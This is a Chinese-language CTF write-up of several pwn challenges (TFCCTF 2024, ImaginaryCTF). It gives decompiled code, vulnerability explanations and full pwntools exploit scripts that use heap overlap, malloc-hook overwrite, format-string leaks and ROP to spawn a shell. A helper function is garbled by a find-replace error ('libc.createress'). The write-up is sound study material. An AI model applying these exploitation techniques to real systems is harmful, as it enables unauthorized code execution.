题目附件https://github.com/nyyyddddn/ctf/tree/main/tfcctf2024

pwn

GUARD-THE-BYPASS

程序的逻辑如下 这里GUARD也就是指canary

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v5; // [rsp+Ch] [rbp-14h] BYREF
  pthread_t newthread; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v7; // [rsp+18h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setup(argc, argv, envp);
  puts("Welcome! Press 1 to start the chall.");
  __isoc99_scanf("%d", &v5);
  if ( v5 != 1 )
  {
    puts("Bye!");
    exit(0);
  }
  len = get_len();
  pthread_create(&newthread, 0LL, game, 0LL);
  pthread_join(newthread, 0LL);
  return v7 - __readfsqword(0x28u);
}

unsigned __int64 __fastcall game(void *a1)
{
  __int64 buf[5]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  memset(buf, 0, 32);
  getchar();
  read(0, buf, len);
  return v3 - __readfsqword(0x28u);
}

有canary 没有pie，修改寄存器的gadget也有

posix接口创建的线程 tls结构体离函数栈帧很近，可以覆盖tls中的canary去绕过canary然后打ret2libc，tls附近有一两个指针在程序执行的时候会往里面写数据，想到了一种很简单的方法，把game函数的canary和tls中的canary覆盖成指向bss的指针，直接一路写过去，就不需要管指针解引用段错误的问题了

vspm

程序的逻辑

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  sub_1289(a1, a2, a3);
  puts("Welcome to the Very Secure Password Manager!");
  puts("--------------------------------------------\n");
  puts("1. Save new password");
  puts("2. Check my passwords");
  puts("3. Delete credentials");
  puts("4. Exit");
  while ( 1 )
  {
    v3 = 0;
    printf("Input: ");
    __isoc99_scanf("%d", &v3);
    getchar();
    if ( v3 <= 0 || v3 > 4 )
      break;
    switch ( v3 )
    {
      case 4:
        exit_();
      case 3:
        delete_password();
        break;
      case 1:
        save_password();
        break;
      default:
        show_password();
        break;
    }
  }
  puts("Not a valid choice :(");
  exit(0);
}

unsigned __int64 save_password()
{
  unsigned int v1; // [rsp+8h] [rbp-68h] BYREF
  int i; // [rsp+Ch] [rbp-64h]
  __int64 v3; // [rsp+10h] [rbp-60h]
  __int64 v4; // [rsp+18h] [rbp-58h]
  __int64 v5; // [rsp+20h] [rbp-50h]
  __int64 v6; // [rsp+28h] [rbp-48h]
  __int64 v7; // [rsp+30h] [rbp-40h]
  __int64 v8; // [rsp+38h] [rbp-38h]
  __int64 v9; // [rsp+40h] [rbp-30h]
  __int64 v10; // [rsp+48h] [rbp-28h]
  __int64 v11; // [rsp+50h] [rbp-20h]
  __int64 v12; // [rsp+58h] [rbp-18h]
  unsigned __int64 v13; // [rsp+68h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  for ( i = 0; i <= 9 && *((_QWORD *)&unk_4060 + 5 * i); ++i )
    ;
  if ( i == 10 )
  {
    puts("No more space to save passwords.");
    exit(0);
  }
  printf("\nSelect length: ");
  v1 = 0;
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( v1 >= 0x79 )
  {
    puts("Sorry, not enough resources!");
    exit(0);
  }
  v3 = 0LL;
  v4 = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0LL;
  v8 = 0LL;
  v9 = 0LL;
  v10 = 0LL;
  v11 = 0LL;
  v12 = 0LL;
  *((_QWORD *)&unk_4060 + 5 * i) = malloc((int)v1);
  printf("Enter credentials: ");
  read(0, *((void **)&unk_4060 + 5 * i), (int)(v1 + 1));
  printf("Name of the credentials: ");
  read(0, (char *)&unk_4060 + 40 * i + 8, (int)(v1 + 1));
  return __readfsqword(0x28u) ^ v13;
}

int show_password()
{
  __int64 v0; // rax
  int i; // [rsp+Ch] [rbp-4h]

  for ( i = 0; i <= 9; ++i )
  {
    v0 = *((_QWORD *)&unk_4060 + 5 * i);
    if ( v0 )
      LODWORD(v0) = printf(
                      "%d. %.*s --> %s",
                      (unsigned int)i,
                      32,
                      (const char *)&unk_4060 + 40 * i + 8,
                      *((const char **)&unk_4060 + 5 * i));
  }
  return v0;
}

unsigned __int64 delete_password()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  v1 = 0;
  printf("Select index: ");
  __isoc99_scanf("%d", &v1);
  getchar();
  if ( !*((_QWORD *)&unk_4060 + 5 * v1) )
  {
    puts("You can't delete a non-existent password.");
    exit(0);
  }
  free(*((void **)&unk_4060 + 5 * v1));
  *((_QWORD *)&unk_4060 + 5 * v1) = 0LL;
  memset((char *)&unk_4060 + 40 * v1 + 8, 0, 0x20uLL);
  return __readfsqword(0x28u) ^ v2;
}

关闭了tcahce的glibc 2.30，漏洞是在create password的时候有一个off by one 可以覆盖相邻地址堆块的 chunk size一个字节，通过 off by one绕过size的限制申请出unsortedbin，然后切分unsortedbin利用残留的bk指针泄露libc基地址，只需要控制一下 off by one的size就可以在切分unsortedbin后和下一个堆块完全重叠，造成heap overlap，之后doube free写malloc hook 为one gadget触发就好了

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "127.0.0.1"
PORT = 9999


elf = context.binary = ELF('./chall')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr

    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)

    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)

    return b


def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    return got, flat(
        p64(0),
        p64(got + 0x218),
        p64(libc.symbols["setcontext"] + 32),
        p64(plt_trampoline) * 0x40,
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )
# e.g. dest, payload = setcontext32.setcontext32(
#         libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
#     )
is_debug = 1
IP = "challs.tfcctf.com"
PORT = 31822

p = connect()

def save_password(len,password,name):
    sla("Input:","1")
    sla("length",str(len))
    sa("Enter credentials:",password)
    sa("Name of the credentials:",name)

def delete_credentials(idx):
    sla("Input:","3")
    sla("Select index:",str(idx))

def check_password():
    sla("Input:","2")

save_password(0x68, b"AAAAAAAA", b"aaaaaaaa")
save_password(0x68, b"BBBBBBBB", b"bbbbbbbb")
save_password(0x68, b"CCCCCCCC", b"cccccccc")
save_password(0x68, b"DDDDDDDD", b"dddddddd")
save_password(0x68, b"EEEEEEEE", b"eeeeeeee")

delete_credentials(0)
save_password(0x68, b"A" * 0x68 + p8(0xe1), b"a" * 0x8)
delete_credentials(1) # unsorted bin 
save_password(0x68, b"B" * 0x8, b"b" * 0x8) # leak unsortedbin bk


check_password()
ru(b"B" * 0x8)
libc_base = u64(r(6).ljust(8,b'\x00')) - (0x76c3f6bb4c90 - 0x76c3f6800000)
success(hex(libc_base))
libc.addr = libc_base

free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
system = libc_base + libc.sym['system']

one_gadget = libc_base + 0xe1fa1

save_password(0x68,b"FFFFFFFF","ffffffff") # heap overlap (cccccccc and ffffffff)

# double free
delete_credentials(2) # delete cccccccc
delete_credentials(3)
delete_credentials(5) # delete ffffffff

save_password(0x68, p64(malloc_hook - 0x23), b"f" * 0x8)
save_password(0x68, b'D' * 8, b"d" * 0x8)
save_password(0x68, p64(malloc_hook - 0x23), b"c" * 0x8)
save_password(0x68, b'A' * 0x13 + p64(one_gadget), b"c" * 0x8)

sl(str(1))
sla("length",str(0x48))




p.interactive()

mcback2dabasics

void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  int choice; // [rsp+0h] [rbp-10h] BYREF
  int i; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v5; // [rsp+8h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  for ( i = 0; i <= 63; ++i )
    chunk_list[i] = 0LL;
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      scanf("%d", &choice);
      if ( choice != 2 )
        break;
      delete();
    }
    if ( choice == 3 )
    {
      puts("Is that all you got? Bye!");
      exit(0);
    }
    if ( choice == 1 )
      create();
    else
      puts("Invalid choice");
  }
}

unsigned __int64 sub_9F4()
{
  int idx; // eax
  _DWORD nbytes[3]; // [rsp+Ch] [rbp-14h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  if ( chunk_number > 63 )
  {
    puts("No more memory available");
    exit(0);
  }
  puts("How much?");
  printf("[+]> ");
  scanf("%d", nbytes);
  if ( nbytes[0] > 0x70u )
  {
    puts("Nope, too big");
    exit(0);
  }
  *(_QWORD *)&nbytes[1] = malloc((unsigned int)(nbytes[0] + 1));
  puts("Data?");
  read(0, *(void **)&nbytes[1], nbytes[0]);
  *(_BYTE *)(nbytes[0] + *(_QWORD *)&nbytes[1]) = 0;
  idx = chunk_number++;
  chunk_list[idx] = *(_QWORD *)&nbytes[1];
  puts("Job done!");
  return __readfsqword(0x28u) ^ v3;
}

unsigned __int64 delete()
{
  unsigned int idx; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Which one?");
  printf("[+]> ");
  scanf("%d", &idx);
  if ( idx > 0x3F )
  {
    puts("Invalid index");
    exit(0);
  }
  free((void *)chunk_list[idx]);
  puts("Job done!");
  return __readfsqword(0x28u) ^ v2;
}

glibc 2.24，这个题非常困难，有uaf，但是泄露不出来地址，我知道要写stdout 打puts的利用链去泄露地址但是不知道怎么做，后面复现的时候发现可以通过堆风水让unsortedbin的fd和fastbin的fd重叠，main arena + 88离 stdout很近，libc地址低12位是固定的，覆盖两个字节就能到stdout，然后因为有size的检查，但是stdoutt往上一小段距离那有一个0x7f的地址可以通过错位字节分配到上面然后绕过这个检查，所以远程的话有十六分之一的概率能打通，需要爆破。申请到stdout后，把write base的低位覆盖，就可以通过puts的利用链去泄露libc。

具体的堆风水是，因为没有edit函数，可以通过在大堆块里面伪造fake chunk然后double free 让chunklist中有fakechunk的指针，伪造一个unsortedbin范围的fakechunk fakechunk和next chunk重叠，或者是大于，通过切分unsortedbin调整fd的位置，重叠后就可以利用了，记得把size改回去，因为重叠后unsortedbin切分的时候会写写size，也不能保证unsortedbin切分后size和原来相同，因为会分到fastbin

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "127.0.0.1"
PORT = 9999
elf = context.binary = ELF('./chall')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr

    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)

    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)

    return b


def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
    got = libc.createress + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.createress + libc.get_section_by_name(".plt").header.sh_creater
    return got, flat(
        p64(0),
        p64(got + 0x218),
        p64(libc.symbols["setcontext"] + 32),
        p64(plt_trampoline) * 0x40,
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )
# e.g. dest, payload = setcontext32.setcontext32(
#         libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
#     )

p = connect()

def create(size,content): # 0x70
    sla(b"[+]> ",b"1")
    sla(b"[+]> ",str(size).encode())
    sa(b"Data?",content)

def delete(idx):
    sla(b"[+]> ",b"2")
    sla(b"[+]> ",str(idx).encode())

create(0x50,b"A" * 0x10 + b"fkchunk0" + p64(0x71)) #0 # fkchunk0 = 0x555555605020
create(0x60,"B" * 8) # 1
create(0x60,"C" * 8) # 2
create(0x60,"D" * 8) # 3

delete(1)
delete(2)
delete(1)

create(0x60,b"\x20\x50") # 4
create(0x60,"C" * 8) # 5
create(0x60,"B" * 8) # 6
create(0x60,"D" * 8) # 7 # fkchunk0


delete(0)
create(0x50,b"A" * 0x10 + p64(0) + p64(0xb1)) # 8
delete(7) # delete fkchunk0

delete(3)
delete(1) 
create(0x30,b"A" * 0x10 + p64(0) + p64(0X61)) # 9 # segmentation unsortedbin and create fakechunk1 0x555555605040
# # heap overlap chunk[1].fd = main_arena + 88

# pwndbg> x /40gx 0x7ffff7bc2600 - 0x43
# 0x7ffff7bc25bd <_IO_2_1_stderr_+157>:	0xfff7bc1640000000	0x000000000000007f
# 0x7ffff7bc25cd <_IO_2_1_stderr_+173>:	0x0000000000000000	0x0000000000000000
# 0x7ffff7bc25dd <_IO_2_1_stderr_+189>:	0x0000000000000000	0x0000000000000000
# 0x7ffff7bc25ed <_IO_2_1_stderr_+205>:	0x0000000000000000	0xfff7bbe400000000
# 0x7ffff7bc25fd <_IO_2_1_stderr_+221>:	0x00fbad288700007f	0xfff7bc2683000000
# 0x7ffff7bc260d <_IO_2_1_stdout_+13>:	0xfff7bc268300007f	0xfff7bc268300007f
# 0x7ffff7bc261d <_IO_2_1_stdout_+29>:	0xfff7bc268300007f	0xfff7bc268300007f
# 0x7ffff7bc262d <_IO_2_1_stdout_+45>:	0xfff7bc268300007f	0xfff7bc268300007f
# 0x7ffff7bc263d <_IO_2_1_stdout_+61>:	0xfff7bc268400007f	0x000000000000007f
# 0x7ffff7bc264d <_IO_2_1_stdout_+77>:	0x0000000000000000	0x0000000000000000
# 0x7ffff7bc265d <_IO_2_1_stdout_+93>:	0x0000000000000000	0xfff7bc18c0000000
# 0x7ffff7bc266d <_IO_2_1_stdout_+109>:	0x000000000100007f	0xffffffffff000000
# 0x7ffff7bc267d <_IO_2_1_stdout_+125>:	0x000a000000ffffff	0xfff7bc3760000000
# 0x7ffff7bc268d <_IO_2_1_stdout_+141>:	0xffffffffff00007f	0x0000000000ffffff
# 0x7ffff7bc269d <_IO_2_1_stdout_+157>:	0xfff7bc1780000000	0x000000000000007f
# 0x7ffff7bc26ad <_IO_2_1_stdout_+173>:	0x0000000000000000	0x0000000000000000


create(0x20,b"\xbd\x25") # 10 # segmentation unsortedbin; chunk[1].fd = stdout


create(0x50,b"E" * 8) # 11
create(0x50,b"F" * 8) # 12
delete(11)
delete(12)
delete(11)

create(0x50,b"\x40\x50") # 13
create(0x50,b"D" * 8) # 14
create(0x50,b"B" * 8) # 15
create(0x50,b"A" * 0x10 + p64(0) + p64(0x71)) # 16 # modify chunk[1].chunksize = 0x71

create(0x60,"SSSSS") # 16

payload = b'A' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + p8(0) #
create(0x61,payload) # 17

rl()
print(r(0x20))
libc_base = u64(r(6).ljust(8,b'\x00')) - 0x3c2600
free_hook = libc_base + libc.sym['__free_hook']
one_gadget = libc_base + 0xce0e5
malloc_hook = libc_base + libc.sym['__malloc_hook']

delete(1)
delete(2)
delete(1)

create(0x60,p64(malloc_hook - 0x23))
create(0x60,"BBBBBBBB")
create(0x60,p64(malloc_hook - 0x23))
create(0x60,b'a' * 0x13 + p64(one_gadget))

sla(b"[+]> ",b"1")
sla(b"[+]> ",str(0x8).encode())




p.interactive()

misc

pwn

imgstore

unsigned __int64 sell_book()
{
  char v1; // [rsp+7h] [rbp-59h] BYREF
  int buf; // [rsp+8h] [rbp-58h] BYREF
  int fd; // [rsp+Ch] [rbp-54h]
  char s[72]; // [rsp+10h] [rbp-50h] BYREF
  unsigned __int64 v5; // [rsp+58h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  fd = open("/dev/urandom", 0);
  read(fd, &buf, 4uLL);
  close(fd);
  buf = (unsigned __int16)buf;
  do
  {
    printf("Enter book title: ");
    fgets(s, 50, stdin);
    printf("Book title --> ");
    printf(s);
    puts(&::s);
    if ( 334873123 * buf == dword_6050 )
    {
      dword_608C = 2;
      sub_1D77(2);
    }
    puts("Sorry, we already have the same title as yours in our database; give me another book title.");
    printf("Still interested in selling your book? [y/n]: ");
    __isoc99_scanf("%1c", &v1);
    getchar();
  }
  while ( v1 == 'y' );
  puts(&::s);
  printf("%s[-] Exiting program..%s\n", "\x1B[31m", "\x1B[0m");
  sleep(1u);
  return __readfsqword(0x28u) ^ v5;
}

unsigned __int64 __fastcall sub_1D77(int a1)
{
  char s[104]; // [rsp+10h] [rbp-70h] BYREF
  unsigned __int64 v3; // [rsp+78h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  sub_18F2();
  if ( a1 == 2 )
  {
    printf("%s[/] UNDER DEVELOPMENT %s\n", "\x1B[44m", "\x1B[0m");
    putchar(62);
    fgets(s, 160, stdin);
  }
  else
  {
    printf("%s[!] SECURITY BREACH DETECTED%s\n", "\x1B[41m", "\x1B[0m");
    puts("[+] BAD HACKER!!");
  }
  return __readfsqword(0x28u) ^ v3;
}

程序中存在格式化字符串漏洞，和一个栈溢出漏洞，泄露地址后 直接改printf函数的返回地址然后打 rop就好了，就不需要任意地址写两次满足上面的约束，任意地址写的话，直接清空两个位置好像也行，/dev/urandom是真随机数，直接清空的话甚至不需要泄露

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "47.100.139.115"
PORT = 30708

elf = context.binary = ELF('./imgstore')
# libc = elf.libc
libc = ELF('./libc.so.6')

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()


sla(">>","3")

# elf - canary - stack
payload = b"-%14$p-%17$p-%18$p"
sla("title:",payload)

ru("Book title --> ")
ru('-')
elf_base = int(r(14),16) - (0x63cbb30f52b0 - 0x63cbb30f3000)
ru('-')
canary = int(r(18),16)
ru('-')
printf_addr = int(r(14),16) - (0x7ffdec097dc0 - 0x7ffdec097d38)
sla("Still interested in selling your book? [y/n]","y")


payload = b"-%10$s"
payload = payload.ljust(0x10,b'\x00')
payload += p64(elf_base + elf.got['puts'])
sla("title:",payload)

ru("Book title --> ")
ru('-')
libc_base = u64(r(6).ljust(8,b'\x00')) - libc.sym['puts']
sla("Still interested in selling your book? [y/n]","y")

payload = b"%" + str(0xf1).encode() + b"c%10$hhn"
payload = payload.ljust(0x10,b'a')
payload += p64(printf_addr)
sla("title:",payload)

time.sleep(0.3)

rdi = elf_base + 0x0000000000002313
ret = elf_base + 0x000000000000101a
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))


payload = b'a' * 0x68 + p64(canary) + b'a' * 0x8
payload += p64(ret) + p64(rdi) + p64(binsh) + p64(system)
sl(payload)




p.interactive()

ropity

.text:0000000000401136                               ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0000000000401136                               public main
.text:0000000000401136                               main proc near                          ; DATA XREF: _start+18↑o
.text:0000000000401136
.text:0000000000401136                               s= byte ptr -8
.text:0000000000401136
.text:0000000000401136                               ; __unwind {
.text:0000000000401136 F3 0F 1E FA                   endbr64
.text:000000000040113A 55                            push    rbp
.text:000000000040113B 48 89 E5                      mov     rbp, rsp
.text:000000000040113E 48 83 EC 10                   sub     rsp, 10h
.text:0000000000401142 48 8B 15 E7 2E 00 00          mov     rdx, cs:__bss_start             ; stream
.text:0000000000401149 48 8D 45 F8                   lea     rax, [rbp+s]
.text:000000000040114D BE 00 01 00 00                mov     esi, 100h                       ; n
.text:0000000000401152 48 89 C7                      mov     rdi, rax                        ; s
.text:0000000000401155 E8 E6 FE FF FF                call    _fgets
.text:0000000000401155
.text:000000000040115A 90                            nop
.text:000000000040115B C9                            leave
.text:000000000040115C C3                            retn
.text:000000000040115C                               ; } // starts at 401136
.text:000000000040115C
.text:000000000040115C                               main endp
.text:000000000040115C
.text:000000000040115D
.text:000000000040115D                               ; =============== S U B R O U T I N E =======================================
.text:000000000040115D
.text:000000000040115D                               ; Attributes: bp-based frame
.text:000000000040115D
.text:000000000040115D                               ; signed __int64 __fastcall printfile(const char *, __int64, int)
.text:000000000040115D                               public printfile
.text:000000000040115D                               printfile proc near
.text:000000000040115D
.text:000000000040115D                               var_8= qword ptr -8
.text:000000000040115D
.text:000000000040115D                               ; __unwind {
.text:000000000040115D F3 0F 1E FA                   endbr64
.text:0000000000401161 55                            push    rbp
.text:0000000000401162 48 89 E5                      mov     rbp, rsp
.text:0000000000401165 48 89 7D F8                   mov     [rbp+var_8], rdi
.text:0000000000401169 48 C7 C0 02 00 00 00          mov     rax, 2
.text:0000000000401170 48 C7 C6 00 00 00 00          mov     rsi, 0                          ; flags
.text:0000000000401177 0F 05                         syscall                                 ; LINUX - sys_open
.text:0000000000401179 48 89 C6                      mov     rsi, rax                        ; in_fd
.text:000000000040117C 48 C7 C7 01 00 00 00          mov     rdi, 1                          ; out_fd
.text:0000000000401183 48 C7 C2 00 00 00 00          mov     rdx, 0                          ; offset
.text:000000000040118A 49 C7 C0 00 01 00 00          mov     r8, 100h
.text:0000000000401191 48 C7 C0 28 00 00 00          mov     rax, 28h ; '('
.text:0000000000401198 0F 05                         syscall                                 ; LINUX - sys_sendfile
.text:000000000040119A 90                            nop
.text:000000000040119B 5D                            pop     rbp
.text:000000000040119C C3                            retn
.text:000000000040119C                               ; } // starts at 40115D
.text:000000000040119C
.text:000000000040119C                               printfile endp
.text:000000000040119C

真的是很巧妙的构造，main函数中存在一个栈溢出，是fgets函数，然后有一个printfile函数，通过open 和 sendfile将一个文件的内容打印出来，printfile在使用前必须控制rdi寄存器才能printfile成功，由于高版本glibc csu函数变成了动态链接，所以以ret结尾能控制寄存器的gadget寥寥无几，能控制rdi寄存器为我想要的值的gadget基本上没有

lhj@lhj-virtual-machine:~/Desktop/ImaginaryCTF/pwn/ropity$ ROPgadget --binary vuln
Gadgets information
============================================================
0x00000000004010ab : add bh, bh ; loopne 0x401115 ; nop ; ret
0x000000000040116f : add byte ptr [rax - 0x39], cl ; mov byte ptr [rax], 0 ; add byte ptr [rax], al ; syscall
0x0000000000401182 : add byte ptr [rax - 0x39], cl ; ret 0
0x0000000000401190 : add byte ptr [rax - 0x39], cl ; shr byte ptr [rax], 0 ; add byte ptr [rax], al ; syscall
0x0000000000401180 : add byte ptr [rax], al ; add byte ptr [rax - 0x39], cl ; ret 0
0x000000000040107c : add byte ptr [rax], al ; add byte ptr [rax], al ; endbr64 ; ret
0x0000000000401173 : add byte ptr [rax], al ; add byte ptr [rax], al ; syscall
0x0000000000401036 : add byte ptr [rax], al ; add dl, dh ; jmp 0x401020
0x000000000040111a : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x000000000040107e : add byte ptr [rax], al ; endbr64 ; ret
0x000000000040118f : add byte ptr [rax], al ; mov rax, 0x28 ; syscall
0x000000000040116e : add byte ptr [rax], al ; mov rsi, 0 ; syscall
0x0000000000401175 : add byte ptr [rax], al ; syscall
0x000000000040100d : add byte ptr [rax], al ; test rax, rax ; je 0x401016 ; call rax
0x000000000040111b : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004010aa : add dil, dil ; loopne 0x401115 ; nop ; ret
0x0000000000401038 : add dl, dh ; jmp 0x401020
0x000000000040111c : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401117 : add eax, 0x2f1b ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401017 : add esp, 8 ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x0000000000401159 : call qword ptr [rax + 0xff3c3c9]
0x000000000040103e : call qword ptr [rax - 0x5e1f00d]
0x0000000000401014 : call rax
0x0000000000401133 : cli ; jmp 0x4010c0
0x0000000000401083 : cli ; ret
0x00000000004011a3 : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401130 : endbr64 ; jmp 0x4010c0
0x0000000000401080 : endbr64 ; ret
0x0000000000401012 : je 0x401016 ; call rax
0x00000000004010a5 : je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e7 : je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
0x000000000040103a : jmp 0x401020
0x0000000000401134 : jmp 0x4010c0
0x000000000040100b : jmp 0x4840103f
0x00000000004010ac : jmp rax
0x000000000040115b : leave ; ret
0x00000000004010ad : loopne 0x401115 ; nop ; ret
0x0000000000401172 : mov byte ptr [rax], 0 ; add byte ptr [rax], al ; syscall
0x0000000000401116 : mov byte ptr [rip + 0x2f1b], 1 ; pop rbp ; ret
0x0000000000401192 : mov eax, 0x28 ; syscall
0x00000000004010a7 : mov edi, 0x404030 ; jmp rax
0x0000000000401171 : mov esi, 0 ; syscall
0x0000000000401191 : mov rax, 0x28 ; syscall
0x0000000000401170 : mov rsi, 0 ; syscall
0x000000000040115a : nop ; leave ; ret
0x000000000040119a : nop ; pop rbp ; ret
0x00000000004010af : nop ; ret
0x000000000040112c : nop dword ptr [rax] ; endbr64 ; jmp 0x4010c0
0x00000000004010a6 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040111d : pop rbp ; ret
0x000000000040101a : ret
0x0000000000401185 : ret 0
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x0000000000401118 : sbb ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401193 : shr byte ptr [rax], 0 ; add byte ptr [rax], al ; syscall
0x0000000000401194 : sub byte ptr [rax], al ; add byte ptr [rax], al ; syscall
0x00000000004011a5 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004011a4 : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401177 : syscall
0x0000000000401010 : test eax, eax ; je 0x401016 ; call rax
0x00000000004010a3 : test eax, eax ; je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e5 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
0x000000000040100f : test rax, rax ; je 0x401016 ; call rax
0x00000000004010a8 : xor byte ptr [rax + 0x40], al ; add bh, bh ; loopne 0x401115 ; nop ; ret

Unique gadgets found: 65

但是，细看会发现 fgets的rdi是可控的 因为取栈上的变量这个过程，实际上是通过 rbp - 一个正整数偏移去取的，如果能控制rbp，那 rdi的值就是可控的，如果将fgets的got修改成printfile，然后保证 rbp - 0x8的值是 ./flag字符串的地址，gadget这个问题不就解决了吗。

